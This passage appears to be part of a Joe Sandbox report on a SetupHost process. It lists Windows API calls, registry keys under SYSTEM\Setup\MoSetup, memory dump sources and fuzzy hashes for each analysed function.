                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009B8DAD
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 009B8E48
                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 009B8E60
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 009B8E71
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009B8EAF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AttributesFile$CreateDirectoryErrorLastwcschr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2805896270-0
                                                                                                                                                                                                                • Opcode ID: af4289fc3cc29681c5af094e226c2ec202dae22375a61c5ec192d55edf090fd2
                                                                                                                                                                                                                • Instruction ID: 85d6b830507ae9d63fd78a18c56e09fd2b9ff6765b33379f77ee21aacb4eeae2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: af4289fc3cc29681c5af094e226c2ec202dae22375a61c5ec192d55edf090fd2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B251A631A0162D87DB20EA748D847DF726DABD8730F114AA5E505A72C0EF74DE86CBD4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,00000000,?), ref: 009BC8A8
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 009BC8AF
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009BC8D1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?), ref: 009BC90E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BC915
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocateFreememcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 461410222-0
                                                                                                                                                                                                                • Opcode ID: ce8f2d003cca35e47b5a727a64e05da621ce5bc0b5b68f90de15219bc0c0c67a
                                                                                                                                                                                                                • Instruction ID: 1a53814040ab9aaeea4d93de8b4bd4ca7ba2fdac86e0a5b3b0e0c55ce9f02e03
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce8f2d003cca35e47b5a727a64e05da621ce5bc0b5b68f90de15219bc0c0c67a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 054175B5B0021AEBCB04DFA5C6D4ADEBBB9EF88720F108529E506D7341DB749D45CB80
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A061F9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A06200
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A0620F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A06216
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?), ref: 00A0628D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFileFreeSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2012773705-0
                                                                                                                                                                                                                • Opcode ID: 6f604c3a2e818ff0ef117137ce4581b03628602780e13f67f55b28837dcb83e1
                                                                                                                                                                                                                • Instruction ID: 2a27522951facb235681ace3a1303898a399f16cdbe3d272f436edf8c02549dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f604c3a2e818ff0ef117137ce4581b03628602780e13f67f55b28837dcb83e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9831B835A0010AEFDB11EF64ED459EEBBB9FF48345B088165E905CB194EB30DD15CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD21F: GetCurrentProcess.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 009BD25E
                                                                                                                                                                                                                  • Part of subcall function 009BD21F: IsWow64Process.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 009BD265
                                                                                                                                                                                                                  • Part of subcall function 009BD21F: GetLastError.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 009BD26F
                                                                                                                                                                                                                  • Part of subcall function 009BD21F: RegCloseKey.ADVAPI32(00000000), ref: 009BD2E1
                                                                                                                                                                                                                • RegSetKeySecurity.ADVAPI32(00000000,00000004,00000000), ref: 009BB537
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 009BB567
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BB576
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseProcess$CurrentErrorFreeLastLocalSecurityWow64
                                                                                                                                                                                                                • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                                                                                                                • API String ID: 3952319208-1711884389
                                                                                                                                                                                                                • Opcode ID: 7a2afc93aa215c97dee52a2b105310ca686e4442d52e0422a872c920353b906f
                                                                                                                                                                                                                • Instruction ID: 3a164293c016fc123a7508e357534b65480f624ea72dacf81df934bfd06df71f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a2afc93aa215c97dee52a2b105310ca686e4442d52e0422a872c920353b906f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6115871900108EBDF25DBA9CA09BFEB779ABC0325F144065B516A71D0DBF49E41DB11
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009BB0FE
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BB13B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseProcess$CurrentErrorLastQueryValueWow64
                                                                                                                                                                                                                • String ID: CorrelationVector$SYSTEM\Setup\MoSetup
                                                                                                                                                                                                                • API String ID: 1531546272-2351024219
                                                                                                                                                                                                                • Opcode ID: f7490c49bbdaddcd3cef7058261a17ce3de6f2913c65b6820598c90bca4a0555
                                                                                                                                                                                                                • Instruction ID: bb7a4491f5c40c771c50646a6d910019ef2c6523b64e7d5301a27e54c4752b76
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7490c49bbdaddcd3cef7058261a17ce3de6f2913c65b6820598c90bca4a0555
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F11A575A04208ABDF05EFE88A95AFEB7FDEBC4324F514069F906932C0D7B19E019610
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009BC688
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BC6C5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseProcess$CurrentErrorLastQueryValueWow64
                                                                                                                                                                                                                • String ID: InstallTicks$SYSTEM\Setup\MoSetup\Volatile
                                                                                                                                                                                                                • API String ID: 1531546272-749814351
                                                                                                                                                                                                                • Opcode ID: 7bcb6d7975cdfcc44c8cf71b670056eacbc25bd3b48a97fa7392200d0fc06ce5
                                                                                                                                                                                                                • Instruction ID: a083b7d8619dd5183420a66259dea79652b18964831478c780aadc1007eae80b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bcb6d7975cdfcc44c8cf71b670056eacbc25bd3b48a97fa7392200d0fc06ce5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29118CB5600209EBCF05EFE58A85EFE77BDEBC4324F144069F905D7251D6709D059710
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009C1150: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,WdsSetupLogInit,00000000), ref: 009C118B
                                                                                                                                                                                                                  • Part of subcall function 009C1150: CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 009C11A0
                                                                                                                                                                                                                  • Part of subcall function 009C1150: FreeSid.ADVAPI32(?), ref: 009C11BA
                                                                                                                                                                                                                  • Part of subcall function 009C1150: SetLastError.KERNEL32(00000000), ref: 009C11CB
                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(00A12698,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00A0031F,WdsSetupLogInit,?,00A0031F,00A12698), ref: 009FEDBF
                                                                                                                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,00A0031F,?,?,00A0031F,00A12698), ref: 009FEDD4
                                                                                                                                                                                                                • FreeSid.ADVAPI32(00A0031F,?,00A0031F,00A12698), ref: 009FEDE4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken$ErrorLast
                                                                                                                                                                                                                • String ID: WdsSetupLogInit
                                                                                                                                                                                                                • API String ID: 217881015-3317556560
                                                                                                                                                                                                                • Opcode ID: 963985d07a8db6b00ce527ce9f9de989822101ef3f179fa1008dd252f98e44dc
                                                                                                                                                                                                                • Instruction ID: cbf485c890227ec5e9158a6e640354539f282d44e54b36190d0c6bde6b5437fe
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 963985d07a8db6b00ce527ce9f9de989822101ef3f179fa1008dd252f98e44dc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8001D671A0030DAFDB10DFE5DD85ABEBBBCFB08340F515869B612E6191DB74DA048B61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                • RegSetValueExW.KERNEL32 ref: 009BB191
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 009BB1C6
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventEnabled.NTDLL(?,?,009BBC0D), ref: 009B9E13
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventWrite.NTDLL(?,?,009BBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 009B9E3B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseEventProcess$CurrentEnabledErrorLastValueWow64Write
                                                                                                                                                                                                                • String ID: CorrelationVector$SYSTEM\Setup\MoSetup
                                                                                                                                                                                                                • API String ID: 414203747-2351024219
                                                                                                                                                                                                                • Opcode ID: 9df3953dc889d541023113ee5f9d4f3f909c99747b6cf452ff0a459e842355a3
                                                                                                                                                                                                                • Instruction ID: 0234ab89f1ab31c1a8b16c0743657a7f2e06a154563d938e91cf59d3a464b63a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9df3953dc889d541023113ee5f9d4f3f909c99747b6cf452ff0a459e842355a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4017571A00309BBDF00BFA5C996BEE7B76EFC0314F104069F511A7291DB719E019B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetBuildLabEx, xrefs: 009BCC05, 009BCC37
                                                                                                                                                                                                                • BuildLabEx, xrefs: 009BCC1D
                                                                                                                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 009BCC17
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: BuildLabEx$CMoSetupOneSettingsHelperT<class CEmptyType>::GetBuildLabEx$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                • API String ID: 431132790-2994999946
                                                                                                                                                                                                                • Opcode ID: a4e1503842bdf81096dcf20a92ec6fc2917dd25a657fa57bc8eddf0943091115
                                                                                                                                                                                                                • Instruction ID: 32edf098706f5ab35bfde2935284bceaee45a1c3952a32bb22831a1b3c484f3f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4e1503842bdf81096dcf20a92ec6fc2917dd25a657fa57bc8eddf0943091115
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D20171B1B502299B8B15EB54CA91ABF7666ABE4B20F114429FA546F381CF70CD0187A1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009FE611
                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000002,00000000,?,0000003C,009FE6FC,?,?,00000000,?,00000000), ref: 009FE629
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,?,?,?,?,scenarioId,?), ref: 009FE633
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 009FE6C1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeH_prolog3HandleLastLibraryModule
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4191248489-0
                                                                                                                                                                                                                • Opcode ID: f52f4317e42ce5f18344ab02b2a450f1bc533858e7a172c5949d6a284081bbb1
                                                                                                                                                                                                                • Instruction ID: 9fd0f7984104678c59850d833e63b0feff8fcebc2df159245744253e73ab245a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f52f4317e42ce5f18344ab02b2a450f1bc533858e7a172c5949d6a284081bbb1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8121A770A0022E8BDB18EFA5C9517BE73B5AF94710F10412CA656EB2A0DF309E018B80
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009FE60A: __EH_prolog3.LIBCMT ref: 009FE611
                                                                                                                                                                                                                  • Part of subcall function 009FE60A: GetModuleHandleExW.KERNEL32(00000002,00000000,?,0000003C,009FE6FC,?,?,00000000,?,00000000), ref: 009FE629
                                                                                                                                                                                                                  • Part of subcall function 009FE60A: GetLastError.KERNEL32(00000000,?,?,?,?,?,?,scenarioId,?), ref: 009FE633
                                                                                                                                                                                                                  • Part of subcall function 009FE60A: FreeLibrary.KERNEL32(00000000), ref: 009FE6C1
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?,?,?,?,?,?,scenarioId,?), ref: 009FE730
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 009FE73F
                                                                                                                                                                                                                • ConX::Setup::Common::COSInfoHelper::GetTargetOSVersion, xrefs: 009FE73A
                                                                                                                                                                                                                • Target OS version: %u.%u.%u.%u, xrefs: 009FE756
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$FreeH_prolog3HandleLibraryModule
                                                                                                                                                                                                                • String ID: ConX::Setup::Common::COSInfoHelper::GetTargetOSVersion$Target OS version: %u.%u.%u.%u$base\ntsetup\conx\common\setuplib\src\osinfo.cpp
                                                                                                                                                                                                                • API String ID: 4039679901-1364077200
                                                                                                                                                                                                                • Opcode ID: 1f567ee2dd703ab7404082d5687a226f79ea3ba5b67b8dfd5826a5a2e29471d1
                                                                                                                                                                                                                • Instruction ID: bc58c7ebdcc2587d4756dc5c18b0b9790d64d72349b39893d2e0a25f02f387f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f567ee2dd703ab7404082d5687a226f79ea3ba5b67b8dfd5826a5a2e29471d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF1181B2600606ABC701EFA9C885D6AFBE8FBC8710F404619F559C3250E770E915CBD2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009FE8E5: __EH_prolog3.LIBCMT ref: 009FE8EC
                                                                                                                                                                                                                  • Part of subcall function 009FE8E5: GetFileVersionInfoSizeExW.VERSION(00000000,00000000,?,00000014,009FE880,?,?), ref: 009FE914
                                                                                                                                                                                                                  • Part of subcall function 009FE8E5: GetLastError.KERNEL32 ref: 009FE921
                                                                                                                                                                                                                • VerQueryValueW.VERSION(00000000,009844A4,?,009FE66B,?,?,?,?,?,?,009FE66B), ref: 009FE89F
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,009FE66B), ref: 009FE8A9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$FileH_prolog3InfoQuerySizeValueVersion
                                                                                                                                                                                                                • String ID: 4
                                                                                                                                                                                                                • API String ID: 3811068625-4088798008
                                                                                                                                                                                                                • Opcode ID: 2ce93fca97140f286d70a527a4c75d75c708705b5efac5fb686e58a96e790da9
                                                                                                                                                                                                                • Instruction ID: e2fd02467295df332724cb731ee6646ddedd450ff2d7164b8158d6dbc597612a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ce93fca97140f286d70a527a4c75d75c708705b5efac5fb686e58a96e790da9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB017C36A0020CABDB14FBF59985AFE77B9ABC5354F204879B60296191EA709E089790
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
